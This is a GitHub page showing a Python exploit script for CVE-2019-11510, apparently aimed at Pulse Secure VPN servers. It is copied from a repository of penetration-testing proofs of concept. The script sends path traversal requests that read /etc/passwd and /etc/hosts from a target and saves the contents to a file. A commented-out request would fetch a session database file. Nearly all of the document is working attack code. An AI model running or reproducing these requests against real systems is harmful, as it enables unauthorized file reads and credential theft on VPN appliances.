forked from Mr-xn/Penetration_Testing_POC
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathCVE-2019-11510.py
93 lines (66 loc) · 3.42 KB
/
CVE-2019-11510.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
import requests
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
import os
import sys
banner = '''
_______ ________ ___ ___ __ ___ __ __ _____ __ ___
/ ____\ \ / / ____| |__ \ / _ \/_ |/ _ \ /_ /_ | ____/_ |/ _ \
| | \ \ / /| |__ ______ ) | | | || | (_) |______| || | |__ | | | | |
| | \ \/ / | __|______/ /| | | || |\__, |______| || |___ \ | | | | |
| |____ \ / | |____ / /_| |_| || | / / | || |___) || | |_| |
\_____| \/ |______| |____|\___/ |_| /_/ |_||_|____/ |_|\___/
Any file read and admin Rce
python By jas502n
'''
print banner
def etc_passwd(url):
file_read = ['/etc/passwd', '/etc/hosts']
if url[-1] == '/':
vuln_url_1 = url + 'dana-na/../dana/html5acc/guacamole/../../../../../../..%s?/dana/html5acc/guacamole/' % file_read[0]
vuln_url_2 = url + 'dana-na/../dana/html5acc/guacamole/../../../../../../..%s?/dana/html5acc/guacamole/' % file_read[1]
output = url[8:-1]
mdb_url = url + "dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?/dana/html5acc/guacamole/"
else:
vuln_url_1 = url + '/dana-na/../dana/html5acc/guacamole/../../../../../../..%s?/dana/html5acc/guacamole/' % file_read[0]
vuln_url_2 = url + '/dana-na/../dana/html5acc/guacamole/../../../../../../..%s?/dana/html5acc/guacamole/' % file_read[1]
output = url[8:]
mdb_url = url + "/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?/dana/html5acc/guacamole/"
r1 = requests.get(vuln_url_1, verify=False)
r2 = requests.get(vuln_url_2, verify=False)
# r3 = requests.get(mdb_url, verify=False)
# print r3.status_code
# print r3.content
# file_mdb = open("data_runtime_mtmp_lmdb_dataa_data.mdb",'ab')
# file_mdb.write(r3.content)
# file.close
if r1.status_code == 200 and 'root:x' in r1.text:
print
print url + " ---------------> Vulnerable"
print "Writing all files to output file " + output
print "\nExtracting " + file_read[0]
print
print vuln_url_1
print "\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print r1.text
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"
# os.system('mkdir %s' % output)
f = open("c.txt","wb")
f.write('\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n')
f.write(file_read[0] + '\n\n' + r1.text+'\n')
f.write('\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n')
if r2.status_code == 200 and 'localhost' in r2.text:
print "Extracting " + file_read[1]
print
print vuln_url_2
print "\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print r2.text
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"
f.write(file_read[1] + '\n\n' + r2.text+'\n')
f.write('\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n')
f.close()
else:
print url + " ---------------> Not Vulnerable"
if __name__ == '__main__':
url = sys.argv[1]
etc_passwd(url)